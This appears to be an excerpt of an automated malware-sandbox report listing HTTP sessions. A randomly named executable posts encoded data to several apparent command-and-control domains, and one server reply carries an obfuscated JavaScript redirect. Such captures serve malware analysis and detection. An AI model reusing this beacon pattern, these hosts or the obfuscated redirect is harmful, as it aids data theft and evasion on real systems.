                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vyIQgYeCQleSOWRI0XZtNLF8kqFlrdffjaihyJMmpO8P2MmknId7gI4wLHoWLJZiNM3vYl2t%2B92Ux%2Blx9n2eHIBH3d%2BdwaJS313hYLB2OpzLqT9ktwoWGOkNs3bZkOV5OLje3lHEhY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe8b3d358c15-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.650032172.67.167.14680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:15.830732107 CET1806OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 50 73 70 50 59 61 6c 4d 49 52 73 71 54 4c 53 48 54 4f 63 54 73 68 35 4f 6e 53 32 77 6f 75 51 37 76 62 30 2b 78 56 39 4d 6e 70 34 64 46 30 6a 34 30 55 77 33 7a 33 67 71 4a 37 57 4b 52 34 36 44 4c 48 4e 69 66 66 6c 54 4a 2b 4d 2b 53 38 59 6a 67 36 59 61 30 4b 59 69 72 4c 53 54 4f 30 65 49 67 41 6a 66 59 43 34 42 79 6a 49 2b 79 53 71 2b 73 77 62 34 43 79 62 50 75 6d 72 48 41 4b 31 55 45 71 59 74 79 48 4a 63 75 51 65 33 72 53 71 49 2b 6d 6f 45 53 6d 79 64 37 6a 4e 71 42 43 55 61 57 6a 74 55 4d [TRUNCATED]
                                                          Data Ascii: b6=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzPspPYalMIRsqTLSHTOcTsh5OnS2wouQ7vb0+xV9Mnp4dF0j40Uw3z3gqJ7WKR46DLHNifflTJ+M+S8Yjg6Ya0KYirLSTO0eIgAjfYC4ByjI+ySq+swb4CybPumrHAK1UEqYtyHJcuQe3rSqI+moESmyd7jNqBCUaWjtUM9+Dp/kHXMpLs7t5ebaFEVA4nOPf2rWzp1mCH6xH426LkwrEcTlUtp9HY5OIMv2aqagH3a8OuGoirChRHi6eyXL3WIU23gKACOsHW0jarXUxcbaBiIuFWpazD/1sC4PsUMOIyCLziuPW/FgtnH+7OBp85ndDSFm1sMOXgiaUUGpraPapF1S15IE1g0C3/n/+IoyBvnr9wiDOi2n3moHO4r/SBOxSa7V0HfP+yJPmw6wj+pmE05XuMNcpOK2vJpsws4LrxeqWcq2YXe6eHdhSVZ1E+p6aQmIJeZ3ebloKDzPCWS42BFxNgXfkSQ7BCFBDXuUKHfHgx99hkNmn5dUe2RazIEV7tJSCMu7LD8YuoQfJElT3+DKh5Elo5/elE0L8FNE2gudvySpv2ErInJWB9TXipWLBTxAYboie4AXPR8+LT0imYTOQH/1uY+zuekhVm5yIyBI3FeLRYLzDac4jxl56vDANn920pQ6ZuQMdy/iwFSTjdl7cfJrUtShP858te5jA5CLGmsldeawfsoETBdh7cNybT1HrCsv+dSxJXuK/eNaMgK2+XSXQnkr4Rd/IwDht0lUIqrjJ5mJ/T7aJBEMgSJDazPlnuEWG11ec8rfDfs/Tsfk0ERbBQUkhh1PwX1WDpR4emyONBPlA3Tkmvh7flClkfBOt/Gq [TRUNCATED]
                                                          Dec 3, 2024 23:29:17.308475971 CET1092INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:17 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HS5drpFChwJ328d1XNN0it3lxzzDZlwcJI72QUKoQQUEqX%2F4oZekHZd0JvFPN5i3uar0%2FmYDU%2FOZM3bcG0xwADWXieDcwkcBbnbtQoOMUNh0M9HYO%2BeG3CXA6jlzYUchyOYQ971cp74%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe9c2af9efa7-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                                                          Dec 3, 2024 23:29:17.310004950 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.650033172.67.167.14680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:18.496896029 CET509OUTGET /o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:19.933777094 CET1113INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:19 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPf1IiQcliVuwc3mFxRJvJp8WgPKsXPOXeG9fGTrnLcPgY0y%2BXfBjUh%2F4yy2Pc0UkgVDGudBThhs1a%2FJSbFgEQjriNgwoeN4ufZAdvIQfyqeC59nW7Qly%2FbS7OK0g5ihVlU9hUBuINk%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6feac9e3bf78d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.650034154.88.22.10180768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:25.623222113 CET748OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 6e 44 39 31 79 6c 33 42 43 61 69 71 56 49 7a 6a 66 53 51 59 68 48 38 32 67 69 77 35 6e 41 57 61 32 50 37 76 6c 61 79 55 7a 4b 36
                                                          Data Ascii: b6=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TnD91yl3BCaiqVIzjfSQYhH82giw5nAWa2P7vlayUzK6
                                                          Dec 3, 2024 23:29:27.207071066 CET364INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 51 b9 61 99 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 f7 f9 a3 05 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>UQa>yf.6PZ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.650036154.88.22.10180768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:28.286525011 CET772OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6e 2b 32 69 36 43 35 48 41 38 59 32 33 37 39 79 57 56 62 48 76 5a 5a 77 64 4f 65 74 49 6c 47 44 65 34 32 53 58 6e 49 57 59 6b 4b 77 3d 3d
                                                          Data Ascii: b6=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxn+2i6C5HA8Y2379yWVbHvZZwdOetIlGDe42SXnIWYkKw==
                                                          Dec 3, 2024 23:29:29.834085941 CET364INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 51 b9 61 99 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 f7 f9 a3 05 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>UQa>yf.6PZ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.650037154.88.22.10180768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:30.957195997 CET1785OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 65 48 75 33 38 65 37 65 69 6e 49 41 7a 6c 77 67 32 55 67 42 55 4b 41 55 6e 56 32 77 69 30 46 6d 66 6d 41 46 45 58 65 76 52 67 45 53 4b 6d 38 56 75 48 45 45 4e 65 66 50 33 2b 4f 6f 73 6d 50 55 57 35 50 67 4c 41 48 5a 65 6c 74 2f 33 71 6a 59 73 34 34 36 57 6d 2f 54 6a 78 7a 70 79 4f 72 4e 53 44 73 56 57 4c 59 48 6d 6d 7a 43 56 68 71 39 56 43 74 70 68 36 72 2f 66 61 57 52 4a 76 53 39 6e 61 62 6b 75 36 56 69 32 68 66 30 50 4b 54 56 35 4f 37 7a 73 6d 56 51 50 58 31 6b 34 70 55 50 69 4e 5a 33 48 [TRUNCATED]
                                                          Data Ascii: b6=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxeHu38e7einIAzlwg2UgBUKAUnV2wi0FmfmAFEXevRgESKm8VuHEENefP3+OosmPUW5PgLAHZelt/3qjYs446Wm/TjxzpyOrNSDsVWLYHmmzCVhq9VCtph6r/faWRJvS9nabku6Vi2hf0PKTV5O7zsmVQPX1k4pUPiNZ3HB7CoYF+WApD+8lmP8P/BUvg8ovoVLGrRpH1p0/wtEjpiYaiRRE5bn1tcCxb04MD9Dy2z2qJKhb6oMWSzw4JYPdkX6PH9FoqyF73RumXBi3pY7W/ytFNuctjb7Mo5ZjHN1a9gdk2OUh2o2KLowWnCzKm5HqwUqwxk92rXPCmxhlGHxzlb1xWVH1IMF0cA1b1W1msXkQmcIFP/eVFGW9yT5buqoSDvnUouWmDy54bENm7qd6vsCyRB3OSoNR55DWi7zytw2Xns2Yy9PwtQDBhvno4cQKpaVtNqYonzjJu1xvhPLVfurtG+RbNviPV1j2Jj7biI+MzayZhw9fYcrpFIRGGhtalS/yOlsdfYcWJgnWVC1q8k90xsslUISCR+fqd29JwO03Rt0AwhUdK7y3MsYQU5wcJaF4Qd142bl/LO7WcBKGeEwbaXVql+EfX0//P7hss1pjMtw4BH+UV0aBQOTFB/TCOeQLPRMxPGnTPPvqmu+lWug/N7/IJk3U7OvCSDOq6jVrUXlZ013YrbkHj8hpyZd4d8/pp68N8DdfcxoX19zaN2gCtgCZLf7EjM8Yk0Lwkj4E7uWEV0P4awNfZMY59pwUMBNXaMpteKQK9XSDSOQhhRAelCbD0W0unASZAQ1OyPsdzQKhmjt2nv+PRSmK6TPn0ed3ASpd [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.650038154.88.22.10180768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:33.621771097 CET502OUTGET /jhb8/?b6=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:35.274543047 CET332INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 7a 5a 6d 56 69 4c 6e 51 35 4d 58 68 6b 4d 53 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly8zZmViLnQ5MXhkMS5wcm86ODkxMQ=c=')</script>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.650039209.74.77.10780768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:41.043953896 CET766OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 53 4c 45 31 54 56 70 79 65 43 2b 35 53 2f 79 69 67 5a 6b 6b 74 71 74 39 78 78 69 56 48 6d 61 59 32 66 70 51 68 76 47 46 63 56 35
